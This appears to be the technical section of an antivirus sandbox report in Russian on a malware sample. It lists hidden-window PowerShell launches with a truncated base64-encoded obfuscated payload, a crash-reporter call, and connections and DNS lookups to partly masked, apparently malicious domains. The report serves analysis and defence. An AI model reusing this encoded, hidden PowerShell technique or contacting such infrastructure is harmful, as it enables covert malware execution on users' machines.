Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgAHMAZQBUAC0AaQB0AGUATQAgACAAdgBhAFIASQBhAEIAbABlADoAOABMAGkAIAAgACgAIABbAHQAWQBwAEUAXQAoACcAUwB5ACcAKwAnAFMAVAAnACsAJwBFACcAKwAnAE0AJwArACcALgBpAE8ALgBEAEkAJwArACcAUg...
- '%CommonProgramFiles(x86)%\Microsoft Shared\DW\DW20.EXE' -x -s 3828
- 'yi###course.com':443
- 'x1.#.lencr.org':80
- 'es###ohouse.com':443
- 'zi####migration.com':443
- 'wi###omhub.com':443
- http://x1.#.lencr.org/
- 'yi###course.com':443
- 'es###ohouse.com':443
- 'zi####migration.com':443
- 'wi###omhub.com':443
- DNS ASK yi###course.com
- DNS ASK x1.#.lencr.org
- DNS ASK es###ohouse.com
- DNS ASK 77##ns.club
- DNS ASK la###roup.net
- DNS ASK zi####migration.com
- DNS ASK vi####otpulsa.com
- DNS ASK wi###omhub.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgAHMAZQBUAC0AaQB0AGUATQAgACAAdgBhAFIASQBhAEIAbABlADoAOABMAGkAIAAgACgAIABbAHQAWQBwAEUAXQAoACcAUwB5ACcAKwAnAFMAVAAnACsAJwBFACcAKwAnAE0AJwArACcALgBpAE8ALgBEAEkAJwArACcAUg... (со скрытым окном)